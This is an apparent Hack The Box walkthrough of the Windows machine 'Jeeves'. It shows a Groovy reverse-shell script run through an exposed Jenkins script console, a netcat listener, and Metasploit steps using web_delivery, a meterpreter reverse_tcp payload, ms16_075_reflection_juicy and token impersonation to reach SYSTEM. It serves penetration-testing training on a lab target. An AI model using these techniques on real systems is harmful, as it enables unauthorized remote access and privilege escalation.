Buy me a tea

Hackthebox - Jeeves

  • Windows

Jeeves

Nmap

┌──(root💀kali)-[~]
└─# nmap -T4 -A -p- 10.10.10.63                                                                                     
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 13:34 EDT
Nmap scan report for 10.10.10.63
Host is up (0.025s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|10|7|Vista (88%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%), Microsoft Windows 10 1607 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (85%), Microsoft Windows 7 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows 10 1511 - 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-04-08T22:44:11
|_  start_date: 2022-04-08T22:41:38
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 5h07m23s, deviation: 0s, median: 5h07m23s

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   24.57 ms 10.10.14.1
2   24.81 ms 10.10.10.63

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.40 seconds

Port 80

  • We have this page image

  • It seems gives stack trace when trying to search for something image

  • But it is just an image, indeed the action of the form will just go to error.html image

  • Gobuster does not give much

Port 50000

  • Here is what we see on the browser for this port: image

  • Gosbuster does not always work for the first time we need to use different wordlists, I tried a few before getting to the askjeeves result. The one that gave the result is directory-list-2.3-big.txt image

  • If we navigate to /askjeeves we have a jenkins server image

  • If we go to jenkins cli we can use a jar and execute command from it image

  • If we look at the system info we get a user name: kohsuke

  • Script console also seems interesting, let's try to get a reverse shell this way image We can find one online here:

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

  • Let's set a listener rlwrap nc -lvp 8044

  • It works we are jeeves\kohsuke

image

  • We can grab our user flag type C:\Users\kohsuke\Desktop\user.txt

  • Here are our privileges image We have the SeImpersonatePrivilege enabled

  • We can use windows exploit suggester with sysinfo

    • wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py

    • python windows-exploit-suggester.py -update (to get the latest db file)

    • python windows-exploit-suggester.py --database 2022-04-08-mssb.xls -i ../sysinfo.txt

  • We have a lot of options including potatoes

Privesc with rotten potato

  • Launch msfconsole

  • use exploit/multi/script/web_delivery

  • show targets

  • set target 2 for PSH

  • set payload windows/meterpreter/reverse_tcp

  • set lhost tun0

  • set SRVHOST tun0 image

  • Now we just need to execute this in our target image

  • And we get a meterpreter session image

  • Let's interact with it sessions -i 1

  • To get the build in potato options lets use metasploit exploit suggester run post/multi/recon/local_exploit_suggester image

  • Using ctrl+z lets now background the shell

  • use exploit/windows/local/ms16_075_reflection_juicy

  • show options

  • set session 1

  • set LHOST tun0

  • run image

  • And it worked image

  • load incognito

  • list_tokens -u

  • impersonate_token "NT AUTHORITY\SYSTEM"

  • Event though we got authority system the root flag is not here instead we have this image

  • if we dir /R we can see our flag

  • more < hm.txt:root.txt:$DATA we can do this to print it

  • Here are a few methods on how to print alternate data streams

PreviousHackthebox - InjectNextHackthebox - Jerry

Last updated